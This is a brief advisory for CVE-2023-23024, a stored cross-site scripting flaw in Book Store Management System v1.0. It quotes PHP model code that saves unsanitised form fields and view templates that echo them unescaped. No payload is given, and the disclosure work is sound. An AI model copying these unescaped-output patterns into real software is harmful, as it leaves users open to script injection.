Headline
CVE-2023-23024: XSS in Book Store
Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the writer parameter.
50 XSS vulnerabilities.
Different sources that saved in the database in this project.
// In file application/models/M_book.php $object=array( 'book_title’=>$this->input->post(‘book_title’), 'year’=>$this->input->post(‘year’), 'price’=>$this->input->post(‘price’), 'category_code’=>$this->input->post(‘category’), 'publisher’=>$this->input->post(‘publisher’), 'writer’=>$this->input->post(‘writer’), 'stock’=>$this->input->post(‘stock’) ); return $this->db->insert('book’, $object);
// In file application/models/M_transaction.php $object=array( 'user_code’=>$this->input->post(‘user_code’), 'buyer_name’=>$this->input->post(‘buyer_name’), ‘tgl’ => date(‘Y-m-d’), 'total’=>$this->input->post(‘total’), 'bookname’=>$this->input->post(‘bookname’), 'book_qty’=>$this->input->post(‘book_qty’), ); $this->db->insert('transaction’, $object);
These sources will pass from the database to the view files.
// In file application/views/v_book.php <td><?=$book->book_title?></td> <td><?=$book->year?></td> <td><?=$book->category_name?></td> <td><?=$book->publisher?></td> <td><?=$book->writer?></td> <td><?=$book->stock?></td>
// In file application/views/v_transaction.php <td><?=$book->book_title?></td> <td><?=$book->category_name?></td> <td class="text-right">$<?=$book->price?></td> <td class="text-right"><?=$book->stock?></td>
<?php foreach ($transaction as $transaction): ?> <option class="text-dark" value="<?=$transaction->user_code?>"><?=$transaction->fullname?></option> <?php endforeach ?>